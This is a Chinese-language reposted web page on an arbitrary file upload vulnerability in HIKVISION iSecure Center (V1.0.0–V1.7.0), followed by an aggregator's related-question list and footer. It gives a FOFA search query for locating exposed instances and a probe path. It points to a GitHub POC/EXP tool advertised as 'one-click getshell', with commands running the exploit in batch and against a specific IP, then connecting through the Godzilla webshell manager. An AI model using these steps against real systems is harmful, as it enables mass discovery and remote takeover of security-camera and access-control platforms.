海康威视综合安防管理平台任意文件上传
最佳答案 问答题库1088位专家为你答疑解惑
系统介绍
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,公众号:web安全工具库,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。
影响范围
iSecure Center(V1.0.0 - V1.7.0 )
复现环境
FOFA:app=“HIKVISION-iSecure-Center”
漏洞复现
ip:port/center/api/files;.js
若出现此页面,则可能存在漏洞
工具快速复现
poc采用无害化扫描检测,无文件残留,可批量检测;exp只做单个url攻击,一键shell
GitHub - xwna/HIKVISION_iSecure_Center-RCE: HIKVISION iSecure Center RCE 海康威视综合安防管理平台任意文件上传 POC&EXP(一键getshell)
POC:
python3 iSecure-Center-RCE_POC.py -f URL.txt
EXP:
python3 iSecure-Center-RCE_EXP.py -u https://182.19.10.99
通过哥斯拉工具连接
下载
GitHub - BeichenDream/Godzilla: 哥斯拉
还可以通过手工修改数据包方式上传。
99%的人还看了
相似问题
- 海康威视综合安防管理平台任意文件上传
- 安防监控EasyCVR视频汇聚平台无法接入Ehome5.0是什么原因?该如何解决?
- 校园安防监控系统升级改造方案:如何实现设备利旧上云与AI视频识别感知?
- 使用RTSP接入安防监控EasyCVR平台,如何配置系统参数以减少起播时间?
- 安防监控系统EasyCVR平台设备通道绑定AI算法的功能设计与开发实现
- 安防监控系统EasyCVR视频汇聚平台,如何实现视频汇聚?
- TSINGSEE智慧安防:AI人员入侵检测算法的工作原理及应用场景概述
- 安防视频监控平台EasyCVR前端解码与后端解码的区别介绍
- TSINGSEE青犀基于AI视频识别技术的平安校园安防视频监控方案
- 安防监控系统EasyCVR视频汇聚平台设备树收藏按钮的细节优化
猜你感兴趣
版权申明
本文"海康威视综合安防管理平台任意文件上传":http://eshow365.cn/6-40537-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!
- 上一篇: 七、文件包含漏洞
- 下一篇: java基础练习缺少项目?看这篇文章就够了(上)!